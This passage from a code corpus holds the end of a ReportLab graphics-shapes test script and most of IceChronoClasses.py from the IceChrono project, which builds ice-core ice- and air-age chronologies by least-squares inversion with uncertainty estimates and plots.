Group(Rect(8, y-gh, textWidth + 4, th, strokeColor=colors.red, strokeWidth=.5, fillColor=colors.lightgrey), String(10, y, text, fontName=fontName, fontSize = fontSize))) y -= 5 return maxx, h-y+gap, D maxx, maxy, D = drawit(_FONTS) if maxx>400 or maxy>200: _,_,D = drawit(_FONTS,maxx,maxy) return D ##def getDrawing14(): ## """This tests inherited properties. Each font should be as it says.""" ## D = Drawing(400, 200) ## ## fontSize = 12 ## D.fontName = 'Courier' ## ## g1 = Group( ## Rect(0, 0, 150, 20, fillColor=colors.yellow), ## String(5, 5, 'Inherited Courier', fontName=inherit, fontSize = fontSize) ## ) ## D.add(g1) ## ## g2 = Group(g1, transform = translate(25,25)) ## D.add(g2) ## ## g3 = Group(g2, transform = translate(25,25)) ## D.add(g3) ## ## g4 = Group(g3, transform = translate(25,25)) ## D.add(g4) ## ## ## return D def getAllFunctionDrawingNames(doTTF=1): "Get a list of drawing function names from somewhere." funcNames = [] # Here we get the names from the global name space. symbols = globals().keys() symbols.sort() for funcName in symbols: if funcName[0:10] == 'getDrawing': if doTTF or funcName!='getDrawing13': funcNames.append(funcName) return funcNames def _evalFuncDrawing(name, D, l=None, g=None): try: d = eval(name + '()', g or globals(), l or locals()) except: d = getFailedDrawing(name) D.append((d, eval(name + '.__doc__'), name[3:])) def getAllTestDrawings(doTTF=1): D = [] for f in getAllFunctionDrawingNames(doTTF=doTTF): _evalFuncDrawing(f,D) return D def writePDF(drawings): "Create and save a PDF file containing some drawings." pdfPath = os.path.splitext(sys.argv[0])[0] + '.pdf' c = Canvas(pdfPath) c.setFont(_FONTS[0], 32) c.drawString(80, 750, 'ReportLab Graphics-Shapes Test') # Print drawings in a loop, with their doc strings. c.setFont(_FONTS[0], 12) y = 740 i = 1 for (drawing, docstring, funcname) in drawings: if y < 300: # Allows 5-6 lines of text. c.showPage() y = 740 # Draw a title. y = y - 30 c.setFont(_FONTS[2],12) c.drawString(80, y, '%s (#%d)' % (funcname, i)) c.setFont(_FONTS[0],12) y = y - 14 textObj = c.beginText(80, y) textObj.textLines(docstring) c.drawText(textObj) y = textObj.getY() y = y - drawing.height drawing.drawOn(c, 80, y) i = i + 1 c.save() print 'wrote %s ' % pdfPath class ShapesTestCase(unittest.TestCase): "Test generating all kinds of shapes." def setUp(self): "Prepare some things before the tests start." self.funcNames = getAllFunctionDrawingNames() self.drawings = [] def tearDown(self): "Do what has to be done after the tests are over." writePDF(self.drawings) # This should always succeed. If each drawing would be # wrapped in a dedicated test method like this one, it # would be possible to have a count for wrong tests # as well... Something like this is left for later... def testAllDrawings(self): "Make a list of drawings." for f in self.funcNames: if f[0:10] == 'getDrawing': # Make an instance and get its doc string. # If that fails, use a default error drawing. _evalFuncDrawing(f,self.drawings) def makeSuite(): "Make a test suite for unit testing." suite = unittest.TestSuite() suite.addTest(ShapesTestCase('testAllDrawings')) return suite if __name__ == "__main__": unittest.TextTestRunner().run(makeSuite())
gpl-3.0
parrenin/IceChrono
IceChronoClasses.py
1
53921
#TODO: extend the chronology down to the bedrock by extrapolating the accumulation #TODO: optinally use a restart file to have a bootstrap method #TODO: is there an elegant way to unpack the variables vector in the model function? #TODO: allow to save the correction vector to be able to restart while changing the resolution #TODO: include some checks for when dDdepth/dz>1 #TODO: Delta-depth observations should be lognormal? #TODO: we should superpose two charts for ice and air ages, one for the age and one for the uncertainty, since the min age is not always near 0. #TODO: also compute the prior uncertainties and show them in the figures. #TODO: the reading of observations does not work if there is only one observation (since the readed matrix is 1D in this case). #TODO: is there really a computation gain with the change of variable for the correction functions? Avoiding this change of variables would make the code easier to understand. I think there is no gain since solving A^-1 b when we have the LU factorisation of A does not cost more than computing A^-1 * b when we have computed A^-1. def interp_lin_aver(xp, x, y): yp=np.nan*np.zeros(np.size(xp)-1) if xp[0]<min(x): xmod=np.concatenate((np.array([xp[0]]),x)) ymod=np.concatenate((np.array([y[0]]),y)) else: xmod=x+0 ymod=y+0 if xp[-1]>max(x): xmod=np.concatenate((xmod,np.array([xp[-1]]))) ymod=np.concatenate((ymod,np.array([y[-1]]))) for i in range(np.size(xp)-1): xx=xmod[np.where(np.logical_and(xmod>xp[i],xmod<xp[i+1]))] xx=np.concatenate((np.array([xp[i]]),xx,np.array([xp[i+1]]))) yy=np.interp(xx, xmod, ymod) yp[i]=np.sum((yy[1:]+yy[:-1])/2*(xx[1:]-xx[:-1]))/(xp[i+1]-xp[i]) return yp def interp_stair_aver(xp, x, y): xmod=x+0 ymod=y+0 if xp[0]<x[0]: xmod=np.concatenate((np.array([xp[0]]),xmod)) ymod=np.concatenate((np.array([y[0]]),ymod)) if xp[-1]>x[-1]: xmod=np.concatenate((xmod,np.array([xp[-1]]))) ymod=np.concatenate((ymod,np.array([y[-1]]))) yint=np.cumsum(np.concatenate((np.array([0]),ymod[:-1]*(xmod[1:]-xmod[:-1])))) yp=(np.interp(xp[1:], xmod, yint)-np.interp(xp[:-1], xmod, yint))/(xp[1:]-xp[:-1]) #Maybe this is suboptimal since we compute twice g(xp[i]) return yp def gaussian(x): return np.exp(-x**2/2) class Drilling: def __init__(self, dlabel): self.label=dlabel def init(self): # print 'Initialization of drilling '+self.label self.accu_prior_rep='staircase' execfile(datadir+'/parameters-AllDrillings.py') execfile(datadir+self.label+'/parameters.py') self.depth_mid=(self.depth[1:]+self.depth[:-1])/2 self.depth_inter=(self.depth[1:]-self.depth[:-1]) ## We set up the raw model if self.calc_a: readarray=np.loadtxt(datadir+self.label+'/isotopes.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.iso_depth=readarray[:,0] if self.calc_a_method=='fullcorr': self.iso_d18Oice=readarray[:,1] self.d18Oice=interp.stair_aver(self.depth, self.iso_depth, self.iso_d18Oice) self.iso_deutice=readarray[:,2] self.deutice=interp_stair_aver(self.depth, self.iso_depth, self.iso_deutice) self.iso_d18Osw=readarray[:,3] self.d18Osw=interp.stair_aver(self.depth, self.iso_depth, self.iso_d18Osw) self.excess=self.deutice-8*self.d18Oice # dans Uemura : d=excess self.a=np.empty_like(self.deutice) self.d18Oice_corr=self.d18Oice-self.d18Osw*(1+self.d18Oice/1000)/(1+self.d18Osw/1000) #Uemura (1) self.deutice_corr=self.deutice-8*self.d18Osw*(1+self.deutice/1000)/(1+8*self.d18Osw/1000) #Uemura et al. (CP, 2012) (2) self.excess_corr=self.deutice_corr-8*self.d18Oice_corr self.deutice_fullcorr=self.deutice_corr+self.gamma_source/self.beta_source*self.excess_corr elif self.calc_a_method=='deut': self.iso_deutice=readarray[:,1] self.deutice_fullcorr=interp_stair_aver(self.depth, self.iso_depth, self.iso_deutice) elif selc.calc_a_method=='d18O': self.d18Oice=readarray[:,1] self.deutice_fullcorr=8*interp_stair_aver(self.depth, self.iso_depth, self.iso_d18Oice) else: print 'Accumulation method not recognized' quit() else: readarray=np.loadtxt(datadir+self.label+'/accu-prior.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.a_depth=readarray[:,0] self.a_a=readarray[:,1] if readarray.shape[1]>=3: self.a_sigma=readarray[:,2] if self.accu_prior_rep=='staircase': self.a_model=interp_stair_aver(self.depth, self.a_depth, self.a_a) elif self.accu_prior_rep=='linear': self.a_model=interp_lin_aver(self.depth, self.a_depth, self.a_a) else: print 'Representation of prior accu scenario not recognized' self.a=self.a_model self.age=np.empty_like(self.depth) self.airage=np.empty_like(self.depth) readarray=np.loadtxt(datadir+self.label+'/density-prior.txt') # self.density_depth=readarray[:,0] if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.D_depth=readarray[:,0] self.D_D=readarray[:,1] self.D=np.interp(self.depth_mid, self.D_depth, self.D_D) self.iedepth=np.cumsum(np.concatenate((np.array([0]), self.D*self.depth_inter))) self.iedepth_mid=(self.iedepth[1:]+self.iedepth[:-1])/2 if self.calc_tau: self.thickness_ie=self.thickness-self.depth[-1]+self.iedepth[-1] if self.calc_LID: if self.depth[0]<self.LID_value: self.LID_depth=np.array([self.depth[0], self.LID_value, self.depth[-1]]) self.LID_LID=np.array([self.depth[0], self.LID_value, self.LID_value]) else: self.LID_depth=np.array([self.depth[0], self.depth[-1]]) self.LID_LID=np.array([self.LID_value, self.LID_value]) else: # self.LID_model=np.loadtxt(datadir+self.label+'/LID-prior.txt') readarray=np.loadtxt(datadir+self.label+'/LID-prior.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.LID_depth=readarray[:,0] self.LID_LID=readarray[:,1] if readarray.shape[1]>=3: self.LID_sigma=readarray[:,2] self.LID_model=np.interp(self.depth, self.LID_depth, self.LID_LID) self.Ddepth=np.empty_like(self.depth) self.udepth=np.empty_like(self.depth) # print 'depth_mid ', np.size(self.depth_mid) # print 'zeta ', np.size(self.zeta) if self.calc_tau: self.thicknessie=self.thickness-self.depth[-1]+self.iedepth[-1] self.zeta=(self.thicknessie-self.iedepth_mid)/self.thicknessie #FIXME: maybe we should use iedepth and thickness_ie here? self.tau=np.empty_like(self.depth_mid) else: readarray=np.loadtxt(datadir+self.label+'/thinning-prior.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.tau_depth=readarray[:,0] self.tau_tau=readarray[:,1] if readarray.shape[1]>=3: self.tau_sigma=readarray[:,2] self.tau_model=np.interp(self.depth_mid, self.tau_depth, self.tau_tau) self.tau=self.tau_model self.raw_model() ## Now we set up the correction functions if self.start=='restart': self.variables=np.loadtxt(datadir+self.label+'/restart.txt') elif self.start=='default': self.corr_a=np.zeros(np.size(self.corr_a_age)) self.corr_LID=np.zeros(np.size(self.corr_LID_age)) self.corr_tau=np.zeros(np.size(self.corr_tau_depth)) elif self.start=='random': self.corr_a=np.random.normal(loc=0., scale=1., size=np.size(self.corr_a_age)) self.corr_LID=np.random.normal(loc=0., scale=1., size=np.size(self.corr_LID_age)) self.corr_tau=np.random.normal(loc=0., scale=1., size=np.size(self.corr_tau_depth)) else: print 'Start option not recognized.' ## Now we set up the correlation matrices self.correlation_corr_a=np.diag(np.ones(np.size(self.corr_a))) self.correlation_corr_LID=np.diag(np.ones(np.size(self.corr_LID))) self.correlation_corr_tau=np.diag(np.ones(np.size(self.corr_tau))) self.chol_a=np.diag(np.ones(np.size(self.corr_a))) self.chol_LID=np.diag(np.ones(np.size(self.corr_LID))) self.chol_tau=np.diag(np.ones(np.size(self.corr_tau))) ## Definition of the covariance matrix of the background try: self.sigmap_corr_a=np.interp(self.corr_a_age, self.fct_age_model(self.a_depth), self.a_sigma) #FIXME: we should average here since it would be more representative except AttributeError: print 'Sigma on prior accu scenario not defined in the accu-prior.txt file' try: self.sigmap_corr_LID=np.interp(self.corr_LID_age, self.fct_airage_model(self.LID_depth) , self.LID_sigma) #FIXME: we should average here since it would be more representative except AttributeError: print 'Sigma on prior LID scenario not defined in the LID-prior.txt file' try: self.sigmap_corr_tau=np.interp(self.corr_tau_depth, self.tau_depth, self.tau_sigma) #FIXME: we should average here since it would be more representative except AttributeError: print 'Sigma on prior thinning scenario not defined in the thinning-prior.txt file' self.correlation_corr_a_before=self.correlation_corr_a+0 self.correlation_corr_LID_before=self.correlation_corr_LID+0 self.correlation_corr_tau_before=self.correlation_corr_tau+0 filename=datadir+self.label+'/parameters-CovariancePrior-init.py' if os.path.isfile(filename): execfile(filename) else: filename=datadir+'/parameters-CovariancePrior-AllDrillings-init.py' if os.path.isfile(filename): execfile(filename) if (self.correlation_corr_a_before!=self.correlation_corr_a).any(): self.chol_a=cholesky(self.correlation_corr_a) if (self.correlation_corr_LID_before!=self.correlation_corr_LID).any(): self.chol_LID=cholesky(self.correlation_corr_LID) if (self.correlation_corr_a_before!=self.correlation_corr_a).any(): self.chol_tau=cholesky(self.correlation_corr_tau) self.variables=np.array([]) # if self.calc_a==True: # self.variables=np.concatenate((self.variables, np.array([self.A0]), np.array([self.beta]))) # if self.calc_tau==True: # self.variables=np.concatenate((self.variables, np.array([self.pprime]), np.array([self.muprime]))) self.variables=np.concatenate((self.variables, self.corr_tau, self.corr_a, self.corr_LID)) #Reading of observations filename=datadir+self.label+'/ice_age.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.icemarkers_depth=readarray[:,0] self.icemarkers_age=readarray[:,1] self.icemarkers_sigma=readarray[:,2] else: self.icemarkers_depth=np.array([]) self.icemarkers_age=np.array([]) self.icemarkers_sigma=np.array([]) filename=datadir+self.label+'/air_age.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.airmarkers_depth=readarray[:,0] self.airmarkers_age=readarray[:,1] self.airmarkers_sigma=readarray[:,2] else: self.airmarkers_depth=np.array([]) self.airmarkers_age=np.array([]) self.airmarkers_sigma=np.array([]) filename=datadir+self.label+'/ice_age_intervals.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.iceintervals_depthtop=readarray[:,0] self.iceintervals_depthbot=readarray[:,1] self.iceintervals_duration=readarray[:,2] self.iceintervals_sigma=readarray[:,3] else: self.iceintervals_depthtop=np.array([]) self.iceintervals_depthbot=np.array([]) self.iceintervals_duration=np.array([]) self.iceintervals_sigma=np.array([]) filename=datadir+self.label+'/air_age_intervals.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.airintervals_depthtop=readarray[:,0] self.airintervals_depthbot=readarray[:,1] self.airintervals_duration=readarray[:,2] self.airintervals_sigma=readarray[:,3] else: self.airintervals_depthtop=np.array([]) self.airintervals_depthbot=np.array([]) self.airintervals_duration=np.array([]) self.airintervals_sigma=np.array([]) filename=datadir+self.label+'/Ddepth.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.Ddepth_depth=readarray[:,0] self.Ddepth_Ddepth=readarray[:,1] self.Ddepth_sigma=readarray[:,2] else: self.Ddepth_depth=np.array([]) self.Ddepth_Ddepth=np.array([]) self.Ddepth_sigma=np.array([]) self.icemarkers_correlation=np.diag(np.ones(np.size(self.icemarkers_depth))) self.airmarkers_correlation=np.diag(np.ones(np.size(self.airmarkers_depth))) self.iceintervals_correlation=np.diag(np.ones(np.size(self.iceintervals_depthtop))) self.airintervals_correlation=np.diag(np.ones(np.size(self.airintervals_depthtop))) self.Ddepth_correlation=np.diag(np.ones(np.size(self.Ddepth_depth))) # print self.icemarkers_correlation filename=datadir+'/parameters-CovarianceObservations-AllDrillings.py' if os.path.isfile(filename): execfile(filename) filename=datadir+self.label+'/parameters-CovarianceObservations.py' if os.path.isfile(filename): execfile(filename) if np.size(self.icemarkers_depth)>0: self.icemarkers_chol=cholesky(self.icemarkers_correlation) self.icemarkers_lu_piv=scipy.linalg.lu_factor(np.transpose(self.icemarkers_chol)) #FIXME: we LU factor a triangular matrix. This is suboptimal. We should set lu_piv directly instead. if np.size(self.airmarkers_depth)>0: self.airmarkers_chol=cholesky(self.airmarkers_correlation) self.airmarkers_lu_piv=scipy.linalg.lu_factor(np.transpose(self.airmarkers_chol)) if np.size(self.iceintervals_depthtop)>0: self.iceintervals_chol=cholesky(self.iceintervals_correlation) self.iceintervals_lu_piv=scipy.linalg.lu_factor(np.transpose(self.iceintervals_chol)) if np.size(self.airintervals_depthtop)>0: self.airintervals_chol=cholesky(self.airintervals_correlation) self.airintervals_lu_piv=scipy.linalg.lu_factor(np.transpose(self.airintervals_chol)) if np.size(self.Ddepth_depth)>0: self.Ddepth_chol=cholesky(self.Ddepth_correlation) self.Ddepth_lu_piv=scipy.linalg.lu_factor(np.transpose(self.Ddepth_chol)) def raw_model(self): #Accumulation if self.calc_a: self.a_model=self.A0*np.exp(self.beta*(self.deutice_fullcorr-self.deutice_fullcorr[0])) #Parrenin et al. (CP, 2007a) 2.3 (6) #Thinning if self.calc_tau: self.p=-1+m.exp(self.pprime) self.mu=m.exp(self.muprime) # self.s=m.tanh(self.sprime) omega_D=1-(self.p+2)/(self.p+1)*(1-self.zeta)+1/(self.p+1)*(1-self.zeta)**(self.p+2) #Parrenin et al. (CP, 2007a) 2.2 (3) omega=self.s*self.zeta+(1-self.s)*omega_D #Parrenin et al. (CP, 2007a) 2.2 (2) self.tau_model=(1-self.mu)*omega+self.mu #udepth self.udepth_model=self.udepth_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau_model*self.depth_inter))) self.LIDIE_model=self.LID_model*self.Dfirn self.ULIDIE_model=np.interp(self.LIDIE_model, self.iedepth, self.udepth_model) #Ice age self.icelayerthick_model=self.tau_model*self.a_model/self.D self.age_model=self.age_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau_model/self.a_model*self.depth_inter))) #air age # self.ice_equiv_depth_model=i_model(np.where(self.udepth_model-self.ULIDIE_model>self.udepth_top, self.udepth_model-self.ULIDIE_model, np.nan)) self.ice_equiv_depth_model=np.interp(self.udepth_model-self.ULIDIE_model, self.udepth_model, self.depth) self.Ddepth_model=self.depth-self.ice_equiv_depth_model self.airage_model=np.interp(self.ice_equiv_depth_model, self.depth, self.age_model, left=np.nan, right=np.nan) self.airlayerthick_model=1/np.diff(self.airage_model) def corrected_model(self): self.correlation_corr_a_before=self.correlation_corr_a+0 self.correlation_corr_LID_before=self.correlation_corr_LID+0 self.correlation_corr_tau_before=self.correlation_corr_tau+0 filename=datadir+'/parameters-CovariancePrior-AllDrillings.py' if os.path.isfile(filename): execfile(filename) filename=datadir+self.label+'/parameters-CovariancePrior.py' if os.path.isfile(filename): execfile(filename) if (self.correlation_corr_a_before!=self.correlation_corr_a).any(): self.chol_a=cholesky(self.correlation_corr_a) if (self.correlation_corr_LID_before!=self.correlation_corr_LID).any(): self.chol_LID=cholesky(self.correlation_corr_LID) if (self.correlation_corr_a_before!=self.correlation_corr_a).any(): self.chol_tau=cholesky(self.correlation_corr_tau) #Accu corr=np.dot(self.chol_a,self.corr_a)*self.sigmap_corr_a self.a=self.a_model*np.exp(np.interp(self.age_model[:-1], self.corr_a_age, corr)) #FIXME: we should use mid-age and not age #Thinning self.tau=self.tau_model*np.exp(np.interp(self.depth_mid, self.corr_tau_depth, np.dot(self.chol_tau,self.corr_tau)*self.sigmap_corr_tau)) self.udepth=self.udepth_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau*self.depth_inter))) corr=np.dot(self.chol_LID,self.corr_LID)*self.sigmap_corr_LID self.LID=self.LID_model*np.exp(np.interp(self.age_model, self.corr_LID_age, corr)) self.LIDIE=self.LID*self.Dfirn self.ULIDIE=np.interp(self.LIDIE, self.iedepth, self.udepth) #Ice age self.icelayerthick=self.tau*self.a/self.D self.age=self.age_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau/self.a*self.depth_inter))) self.ice_equiv_depth=np.interp(self.udepth-self.ULIDIE, self.udepth, self.depth) self.Ddepth=self.depth-self.ice_equiv_depth self.airage=np.interp(self.ice_equiv_depth, self.depth,self.age, left=np.nan, right=np.nan) self.airlayerthick=1/np.diff(self.airage) def model(self, variables): index=0 # if self.calc_a==True: # self.A0=variables[index] # self.beta=variables[index+1] # index=index+2 # if self.calc_tau==True: ## self.p=-1+m.exp(variables[index]) ## self.s=variables[index+1] ## self.mu=variables[index+2] ## index=index+3 # self.pprime=variables[index] # self.muprime=variables[index+1] # index=index+2 self.corr_tau=variables[index:index+np.size(self.corr_tau)] self.corr_a=variables[index+np.size(self.corr_tau):index+np.size(self.corr_tau)+np.size(self.corr_a)] self.corr_LID=variables[index+np.size(self.corr_tau)+np.size(self.corr_a):index+np.size(self.corr_tau)+np.size(self.corr_a)+np.size(self.corr_LID)] ##Raw model self.raw_model() ##Corrected model self.corrected_model() return np.concatenate((self.age,self.airage,self.Ddepth,self.a,self.tau,self.LID,self.icelayerthick,self.airlayerthick)) def write_init(self): self.a_init=self.a self.LID_init=self.LID self.tau_init=self.tau self.icelayerthick_init=self.icelayerthick self.airlayerthick_init=self.airlayerthick self.age_init=self.age self.airage_init=self.airage self.Ddepth_init=self.Ddepth def fct_age(self, depth): return np.interp(depth, self.depth, self.age) def fct_age_init(self, depth): return np.interp(depth, self.depth, self.age_init) def fct_age_model(self, depth): return np.interp(depth, self.depth,self.age_model) def fct_airage(self, depth): return np.interp(depth, self.depth, self.airage) def fct_airage_init(self, depth): return np.interp(depth, self.depth, self.airage_init) def fct_airage_model(self, depth): return np.interp(depth, self.depth, self.airage_model) def fct_Ddepth(self, depth): return np.interp(depth, self.depth, self.Ddepth) def residuals(self, variables): self.model(variables) resi_corr_a=self.corr_a resi_corr_LID=self.corr_LID resi_corr_tau=self.corr_tau resi_age=(self.fct_age(self.icemarkers_depth)-self.icemarkers_age)/self.icemarkers_sigma if np.size(self.icemarkers_depth)>0: resi_age=scipy.linalg.lu_solve(self.icemarkers_lu_piv,resi_age) resi_airage=(self.fct_airage(self.airmarkers_depth)-self.airmarkers_age)/self.airmarkers_sigma if np.size(self.airmarkers_depth)>0: resi_airage=scipy.linalg.lu_solve(self.airmarkers_lu_piv,resi_airage) resi_iceint=(self.fct_age(self.iceintervals_depthbot)-self.fct_age(self.iceintervals_depthtop)-self.iceintervals_duration)/self.iceintervals_sigma if np.size(self.iceintervals_depthtop)>0: resi_iceint=scipy.linalg.lu_solve(self.iceintervals_lu_piv,resi_iceint) resi_airint=(self.fct_airage(self.airintervals_depthbot)-self.fct_airage(self.airintervals_depthtop)-self.airintervals_duration)/self.airintervals_sigma if np.size(self.airintervals_depthtop)>0: resi_airint=scipy.linalg.lu_solve(self.airintervals_lu_piv,resi_airint) resi_Ddepth=(self.fct_Ddepth(self.Ddepth_depth)-self.Ddepth_Ddepth)/self.Ddepth_sigma if np.size(self.Ddepth_depth)>0: resi_Ddepth=scipy.linalg.lu_solve(self.Ddepth_lu_piv,resi_Ddepth) return np.concatenate((resi_corr_a, resi_corr_LID, resi_corr_tau, resi_age,resi_airage, resi_iceint, resi_airint, resi_Ddepth)) def cost_function(self): cost=np.dot(self.residuals,np.transpose(self.residuals)) return cost def jacobian(self): epsilon=np.sqrt(np.diag(self.hess))/100000000. model0=self.model(self.variables) jacob=np.empty((np.size(model0), np.size(self.variables))) for i in np.arange(np.size(self.variables)): var=self.variables+0 var[i]=var[i]+epsilon[i] model1=self.model(var) jacob[:,i]=(model1-model0)/epsilon[i] model0=self.model(self.variables) return jacob def optimisation(self) : self.variables,self.hess,self.infodict,mesg,ier=leastsq(self.residuals, self.variables, full_output=1) print self.variables print self.hess return self.variables, self.hess def sigma(self): jacob=self.jacobian() index=0 c_model=np.dot(jacob[index:index+np.size(self.age),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.age),:]))) self.sigma_age=np.sqrt(np.diag(c_model)) index=index+np.size(self.age) c_model=np.dot(jacob[index:index+np.size(self.airage),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.airage),:]))) self.sigma_airage=np.sqrt(np.diag(c_model)) index=index+np.size(self.airage) c_model=np.dot(jacob[index:index+np.size(self.Ddepth),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.Ddepth),:]))) self.sigma_Ddepth=np.sqrt(np.diag(c_model)) index=index+np.size(self.Ddepth) c_model=np.dot(jacob[index:index+np.size(self.a),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.a),:]))) self.sigma_a=np.sqrt(np.diag(c_model)) index=index+np.size(self.a) c_model=np.dot(jacob[index:index+np.size(self.tau),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.tau),:]))) self.sigma_tau=np.sqrt(np.diag(c_model)) index=index+np.size(self.tau) c_model=np.dot(jacob[index:index+np.size(self.LID),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.LID),:]))) self.sigma_LID=np.sqrt(np.diag(c_model)) index=index+np.size(self.LID) c_model=np.dot(jacob[index:index+np.size(self.icelayerthick),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.icelayerthick),:]))) self.sigma_icelayerthick=np.sqrt(np.diag(c_model)) index=index+np.size(self.icelayerthick) c_model=np.dot(jacob[index:index+np.size(self.airlayerthick),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.airlayerthick),:]))) self.sigma_airlayerthick=np.sqrt(np.diag(c_model)) self.sigma_a_model=np.interp((self.age_model[1:]+self.age_model[:-1])/2, self.corr_a_age, self.sigmap_corr_a) self.sigma_LID_model=np.interp(self.age_model, self.corr_LID_age, self.sigmap_corr_LID) self.sigma_tau_model=np.interp(self.depth_mid, self.corr_tau_depth, self.sigmap_corr_tau) def sigma_zero(self): self.sigma_age=np.zeros_like(self.age) self.sigma_airage=np.zeros_like(self.airage) self.sigma_Ddepth=np.zeros_like(self.Ddepth) self.sigma_a=np.zeros_like(self.a) self.sigma_tau=np.zeros_like(self.tau) self.sigma_LID=np.zeros_like(self.LID) self.sigma_icelayerthick=np.zeros_like(self.icelayerthick) self.sigma_airlayerthick=np.zeros_like(self.airlayerthick) self.sigma_a_model=np.interp((self.age_model[1:]+self.age_model[:-1])/2, self.corr_a_age, self.sigmap_corr_a) self.sigma_LID_model=np.interp(self.age_model, self.corr_LID_age, self.sigmap_corr_LID) self.sigma_tau_model=np.interp(self.depth_mid, self.corr_tau_depth, self.sigmap_corr_tau) def figures(self): mpl.figure(self.label+' thinning') mpl.title(self.label+' thinning') mpl.xlabel('Thinning') mpl.ylabel('Depth') if show_initial: mpl.plot(self.tau_init, self.depth_mid, color=color_init, label='Initial') mpl.plot(self.tau_model, self.depth_mid, color=color_mod, label='Prior') mpl.plot(self.tau, self.depth_mid, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth_mid, self.tau-self.sigma_tau, self.tau+self.sigma_tau, color=color_ci) # mpl.plot(self.tau+self.sigma_tau, self.depth_mid, color='k', linestyle='-', label='+/- 1 sigma') # mpl.plot(self.tau-self.sigma_tau, self.depth_mid, color='k', linestyle='-') x1,x2,y1,y2 = mpl.axis() mpl.axis((x1,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/thinning.pdf') pp.savefig(mpl.figure(self.label+' thinning')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' ice layer thickness') mpl.title(self.label+' ice layer thickness') mpl.xlabel('thickness of annual layers (m/yr)') mpl.ylabel('Depth') if show_initial: mpl.plot(self.icelayerthick_init, self.depth_mid, color=color_init, label='Initial') # for i in range(np.size(self.iceintervals_duration)): # y1=self.iceintervals_depthtop[i] # y2=self.iceintervals_depthbot[i] # x1=(y2-y1)/(self.iceintervals_duration[i]+self.iceintervals_sigma[i]) # x2=(y2-y1)/(self.iceintervals_duration[i]-self.iceintervals_sigma[i]) # yserie=np.array([y1,y1,y2,y2,y1]) # xserie=np.array([x1,x2,x2,x1,x1]) # if i==0: # mpl.plot(xserie,yserie, color=color_obs, label="observations") # else: # mpl.plot(xserie,yserie, color=color_obs) mpl.plot(self.icelayerthick_model, self.depth_mid, color=color_mod, label='Prior') mpl.plot(self.icelayerthick, self.depth_mid, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth_mid, self.icelayerthick-self.sigma_icelayerthick, self.icelayerthick+self.sigma_icelayerthick, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((0,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/icelayerthick.pdf') pp.savefig(mpl.figure(self.label+' ice layer thickness')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air layer thickness') mpl.title(self.label+' air layer thickness') mpl.xlabel('thickness of annual layers (m/yr)') mpl.ylabel('Depth') if show_initial: mpl.plot(self.airlayerthick_init, self.depth_mid, color=color_init, label='Initial') # for i in range(np.size(self.airintervals_duration)): # y1=self.airintervals_depthtop[i] # y2=self.airintervals_depthbot[i] # x1=(y2-y1)/(self.airintervals_duration[i]+self.airintervals_sigma[i]) # x2=(y2-y1)/(self.airintervals_duration[i]-self.airintervals_sigma[i]) # yserie=np.array([y1,y1,y2,y2,y1]) # xserie=np.array([x1,x2,x2,x1,x1]) # if i==0: # mpl.plot(xserie,yserie, color=color_obs, label='observations') # else: # mpl.plot(xserie,yserie, color=color_obs) mpl.plot(self.airlayerthick_model, self.depth_mid, color=color_mod, label='Prior') mpl.plot(self.airlayerthick, self.depth_mid, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth_mid, self.airlayerthick-self.sigma_airlayerthick, self.airlayerthick+self.sigma_airlayerthick, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((0, 2*max(self.icelayerthick),self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/airlayerthick.pdf') if show_airlayerthick: pp.savefig(mpl.figure(self.label+' air layer thickness')) #Fixme: buggy line on anaconda pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' accumulation') mpl.title(self.label+' accumulation') mpl.xlabel('Optimized age 